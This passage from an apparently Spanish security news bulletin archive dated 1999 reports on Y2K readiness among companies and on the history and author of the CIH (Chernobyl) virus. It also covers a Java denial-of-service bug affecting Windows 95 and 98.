del Acuerdo del Consejo de Ministros del 12 de junio de 1998.
Por el cual, se le encargó al Instituto Nacional del Consumo
el desarrollo de un programa con el fin de informar a los
consumidores del efecto pernicioso de la entrada del milenio
en los componentes electrónicos.

Otro modo de permanecer informado del problema del milenio y como
nos puede afectar en cuanto informática, electrodomésticos, etc.
es con la pagina web:www.map.es/csi/2000.htm perteneciente al
Centro de Servicios de Información 2000/euro del Ministerio de
Administraciones Públicas.

Entre las empresas que por su relevancia nos causa extrañeza por
la falta de preparación para el año 2000, se encuentra Compaq,
uno de los principales fabricantes de ordenadores. Esta firma
asegura no tener problemas con los ordenadores vendidos a partir
de la semana 41 de 1997. También informa que los ordenadores
vendidos antes de dicha fecha tendrán que evitar el problema
con la aplicación de un parche que estará a disposición de los
clientes en un disquete. Pero incluso hay ordenadores de Compaq
anteriores a 1996 que no podrán superar de ninguna forma el
cambio de milenio.

Al igual que Compaq se encuentran otras empresas del prestigio
de Microsoft, Siemens o Toshiba. Las que afirman estar totalmente
preparadas son IBM, que empezó a afrontar el problema hace mas
de diez años y Apple que se jacta de ser el único fabricante de
ordenadores que no ha fabricado máquinas con este problema.

Más información:
Instituto Nacional de Consumo: http://www.consumo-inc.es


Antonio Román



martes, 4 de mayo de 1999

Las versiones desconocidas del CIH

El virus CIH, en su recién nombrada versión Chernobyl, ha desatado
en la última semana numerosos artículos. Pese a la gran cantidad de
información arrojada entorno al virus, HispaSec os presenta nuevos
datos sobre versiones anteriores que hasta la fecha no han sido
publicadas en ningún otro medio.
La expectación que ha levantado el virus ha hecho correr ríos de
tinta, en la mayoría de las ocasiones han sido artículos de opinión
donde se manejaba, con mayor o menor acierto, la misma información.
En HispaSec, como en ocasiones anteriores, hemos querido ahondar en
los orígenes de la noticia y ofreceros datos partiendo directamente
del código del virus.

Ha sido durante este estudio, del que os daremos buena cuenta en un
análisis técnico sobre el CIH, donde hemos descubierto a través del
código original del autor las versiones 1.0 y 1.1 que fueron el
origen del archiconocido Chernóbyl, es decir, CIH versión 1.2.

Pese a que en casi todos los artículos a los que hemos podido tener
acceso se hacía hincapié en señalar las tres versiones conocidas del
CIH: 1.2, 1.3 y 1.4, nos ha sorprendido que nadie se preguntara por
las anteriores, ya que parece lógico pensar, según la numeración,
que existieran estas versiones.

La primera versión del virus, CIH 1.0, fue programada el 26 de abril
de 1998. En esta primera etapa el virus se replicaba infectando los
ficheros ejecutables de Windows 95 (Portable Executable) mediante la
modificación de la IDT (Interrupt Descriptor Table) para conseguir
los máximos privilegios en el sistema. Tenía en cuenta las premisas
obvias en un virus tradicional, como son el infectar también ficheros
de solo lectura, no modificar la fecha y hora originales o evitar
reinfectar un mismo ejecutable. El tamaño del virus era entonces de
sólo 656 bytes.

El 15 de mayo de 1998 vio la luz la versión 1.1, entre las
modificaciones destacan las acciones llevadas a cabo ante las
excepciones que el sistema operativo podía presentar para evitar
ser descubierto, especialmente en NT, y la optimización de varios
algoritmos. Es en esta versión cuando se añade una de las capacidades
más elogiadas, la de no incrementar el tamaño de los ficheros
infectados al introducir su código entre los huecos que el programa
víctima presentaba. Su tamaño aumenta a 796 bytes.

Días más tarde, el 21 de mayo, nacía el CIH v1.2, y que algunos
antivirus han insistido en rebautizar como Chernóbyl. Básicamente se
trataba del mismo código que la versión 1.1, con algunos bugs menores
corregidos y con uno de los payload (efecto) más dañinos de la historia
de los virus informáticos: "destrucción" del disco duro y la BIOS. En
esta ocasión el tamaño aumentó hasta los 1003 bytes.


Bernardo Quintero



lunes, 3 de mayo de 1999

El CIH, su autor y su solución

El virus CIH sigue dando mucho de que hablar, no sólo por los
efectos que causó el pasado 26 de abril sino porque se ha
descubierto al autor y porque puede verse una solución para
todos aquellos ordenadores afectados.
El virus CIH puede ser considerado como uno de los virus más
destructivos de la historia de la informática. El 26 de abril,
fecha de su activación este virus tiene como acción borrar los
datos de la BIOS, parte vital del ordenador, hasta tal punto
que hace imposible volver a encender el ordenador.

Pero pasada ya la fatal fecha, este virus, también conocido como
Chernobyl, sigue siendo noticia, ya que un estudiante Taiwanes ha
reconocido la autoría del CIH. Chen Ing-hau, cuyas iniciales dan
lugar al nombre del virus, desarrolló el programa mientras cursaba
sus estudios de ingeniería informática en el Instituto de Tecnología
Tatung de Taiwan.

La policía taiwanesa no ha tomado ninguna acción contra el joven
programador, ya que no hay ninguna denuncia contra él. Se pueden
buscar las similitudes con el caso Melissa, en las que el
programador puede ser condenado a una pena de hasta 40 años de
prisión. ¿Que le hubiera pasado al joven taiwanes de encontrarse
en Estados Unidos?.

Por otra parte, todos los ordenadores afectados por el Chernobyl
pueden tener solución. Esto es lo que afirma Monirul Islam Sharif,
un estudiante de informática de la Universidad de Dhaka (Bangladesh),
que ha realizado un programa, que bajo el nombre de "Mrecover" puede
recuperar un ordenador atacado por el CIH.

Más información:
CNN
Techserver
Instituto de Tecnología Tatung
Cnet



Antonio Ropero



domingo, 2 de mayo de 1999

Un error en Java afecta a Windows 95 y 98

Se ha encontrado un error por el que a través de un programa Java
malicioso se puede llegar a bloquear los ordenadores con sistema
operativo Windows 95 o 98.
El bug, descubierto por Joseph Ashwood, estudiante de la universidad
de California, hace uso de Java para aprovecharse de un problema
bien conocido de los sistemas operativos Windows 95 y 98. Se basa
en crear más y más procesos, llamados hilos, hasta que al sistema
se le agoten todos los recursos.

La sobrecarga de hilos causada por el programa Java resulta
interesante ya que consigue colgar los sistemas Windows 95 y 98
sin abandonar la caja de arena de Java. La caja de arena o
«sandbox» está diseñada para restringir el acceso de los programas
Java al sistema operativo, aislando su ejecución. Los sistemas
operativos más robustos, como Windows NT o Sun Solaris, se
encuentran libres del problema.

El código malicioso puede ser incluido dentro de una página web,
provocando que se abran sucesivas ventanas del navegador hasta que
los recursos disponibles por el sistema desaparecen totalmente. El
problema afecta al sistema operativo, independientemente del
navegador empleado Tanto Sun como Microsoft reconocen el problema
pero argumentan la dificultad de la protección contra este tipo de
ataques de denegación de servicios.

Microsoft acepta la dificultad para eliminar esta debilidad del
sistema operativo, ya que el problema se encuentra situado en lo
más profundo de la arquitectura de Windows. Modificar el código
relevante requiere una revisión detallada, de ahí surgió la
necesidad de Windows NT, un sistema operativo con una arquitectura
de hilos más robusta.

Más información:
Cnet: http://www.news.com/News/Item/0,4,0-35760,00.html?st.ne.ni.lh
Descripción del bug: http://www.alienware.com/hive/html/interviews/bugman.html
http://www-scf.usc.edu/~ashwood/minThread.html



Antonio Ropero



sábado, 1 de mayo de 1999

Inquietud española ante el 2000

Inportantes empresas tales como Iberia prometen hacer inversiones multimillonarias para afrontar el problema de la entrada del milenio. Aún así, no dan certeza de que sus sistemas informáticos estén preparados para afrontar sin problemas la entrada del 2000. Ante esta falta de seguridad lo que sí afirman es que en caso de peligro no volaran sus aviones.
Otras empresas que sí afirman estar preparadas totalmente ante el cambio de añoi son el son 4B, Servired y Red 6000 que son las que se encargan con sus mas de 37000 cajeros en toda España de proveernos de fondos en papel moneda, aún así piensan que sus problemas pueden venir al efecto psicológico de esta fecha, y el posible intento de acaparar dinero por parte de sus clientes temiendo el fallo de los cajeros
automáticos. Para evitar este problema de acaparación en los Estados Unidos se lanzarán al mercado 50.000 millones de dólares como medida preventiva. Esto y dentro de la capacidad de mimetismo de los países del ámbito estadounidense puede hacer que gobiernos como el español se pueda plantear un acto similar.

Otras empresas como Seat aseguran que todos sus vehículos fabricados a partir del 1992 no tendrán problemas. Endesa principal empresa distribuidora de energía eléctrica afirma tener sus planes para el efecto 2000 terminados, aún así bajaran al mínimo el flujo de compra de energía con sus distribuidores de Francia, esto es debido a que ninguna empresa afirma al cien por cien poder estar libres de este problema.

Otro ejemplo evidente de la inseguridad manifiesta es la petición por parte del presidente del Banco Central Europeo de hacer el día 1 de Enero del 2000 festivo para todos los Bancos que trabajan en la CE. Pero tampoco la sanidad pública está libre de problemas, y en estudios realizados por la Agencia de Evaluación de Tecnología Médica pueden haber problemas tales como caducidad por error de bancos de sangre, dosificaciones incorrectas de medicamentos y transmisiones de datos erróneos con el problema que conlleva de diagnósticos y terapias.


Antonio Román